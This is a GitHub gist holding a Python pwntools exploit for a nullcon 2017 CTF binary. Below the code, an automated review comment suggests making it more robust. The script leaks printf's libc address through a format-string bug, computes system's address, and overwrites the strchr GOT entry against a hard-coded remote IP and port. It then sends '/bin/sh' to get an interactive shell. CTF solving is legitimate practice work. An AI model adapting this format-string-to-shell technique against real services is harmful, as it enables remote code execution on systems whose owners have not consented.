

@rverton
Created March 26, 2017 11:46


  1. rverton created this gist Mar 26, 2017.
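--- a/level1-pwn.py
+++ b/level1-pwn.py
@@ -0,0 +1,46 @@
+#!/usr/bin/python
+
+# exploit for level1.bin (nullcon 2017)
+
+from pwn import *
+
+def add_book(p):
+    p.sendline('1')
+    p.recvuntil('Enter book name: ')
+    p.sendline('a')
+    p.recvuntil('Enter book id: ')
+    p.sendline('1')
+
+def leak_addr(p, addr):
+    p.sendline('3')
+    p.recvuntil('Enter query: ')
+    leak_fmt_str = p32(addr) + "%11$s"
+    p.sendline(leak_fmt_str)
+    result = p.recvline().strip()
+    return u32(result[20:24])
+
+if __name__ == '__main__':
+    #p = process('./level1.bin', stdin=process.PTY)
+    p = remote('34.198.96.6', 9001)
+    p.recvuntil('Enter choice: ')
+
+    add_book(p)
+
+    p.recvuntil('Enter choice: ')
+
+    printf = leak_addr(p, 0x804b014)
+    printf_offset = 0x0004cdd0
+    system_offset = 0x0003fe70
+    system = printf - printf_offset + system_offset
+    strchr_got = 0x804b030
+
+    log.info("printf @ %#x" % printf)
+    log.info("system @ %#x" % system)
+
+    payload = "/bin/sh # "
+    payload += fmtstr_payload(14, {strchr_got: system}, numbwritten=12)
+
+    p.sendline('3')
+    p.recvuntil('Enter query: ')
+    p.sendline(payload)
+    p.interactive()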
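Review bot: leak_addr unpacks `result[20:24]` without checking that the reply holds at least 24 bytes, so a short or empty response (a failed leak) reaches `u32` as a truncated slice and dies with an unhelpful unpack error instead of a clear message; guard it with `if len(result) < 24: log.error("unexpected leak reply: %r" % result)` before the unpack. The slice offset 20, the `%11$s` position and the argument index 14 passed to fmtstr_payload are undocumented magic numbers, and the libc offsets are tied to one specific libc build — a comment on each naming what it corresponds to would spare the next reader from re-deriving them. The script also concatenates the bytes returned by `p32()` with `str` literals, which presumably only works under the Python 2 interpreter the shebang selects; stating that in the header comment (e.g. `# Python 2 only: mixes str and packed bytes`) would make the constraint explicit.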